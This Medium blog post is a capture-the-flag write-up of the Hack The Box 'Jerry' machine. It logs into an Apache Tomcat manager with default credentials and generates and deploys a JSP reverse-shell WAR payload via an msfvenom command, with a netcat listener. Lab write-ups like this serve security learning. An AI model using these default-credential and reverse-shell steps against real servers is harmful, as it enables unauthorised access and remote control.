Hack The Box Jerry Write-Up



Nmap reveals that port number 8080 is open, let’s visit the port number 8080 in web browser.

Apache Tomcat/7.0.88
Basic access authentication

To access Tomcat manger we need a valid Username and Password, When we enter any invalid Username and Password we will get a 403 Access Denied message.

403 Acess Denied

Let’s try the Username : tomacat and password : s3cret

Once we successfully authenticate were brought to the Tomcat Web Application . The Tomcat manager has an option to upload .war files to the server.

Tomcat Web Application Manager


We can use msfvenom to generate a java payload for reverse shell with .war extension

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=4444 -f war > cmd.war

Upload and Deploy the reverse shell then visit

Let’s open a netcat Listener to get the shell which will be generated after our cmd.war file gets executed.

The Flag is located in


The user and root flags are written in 2 for the price of 1.txt file and it can be read using type command.

type "2 for the price of 1.txt"




Self-learner |Bug Hunter|

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Akash c

Akash c

Self-learner |Bug Hunter|

More from Medium

HTB: Valentine Writeup w/o Metasploit

BruteLoops — Protocol Agnostic Online Password Guessing API

Hacking ticketastic

Day 22 Cross Site Scripting — Part 1 #100DaysofHacking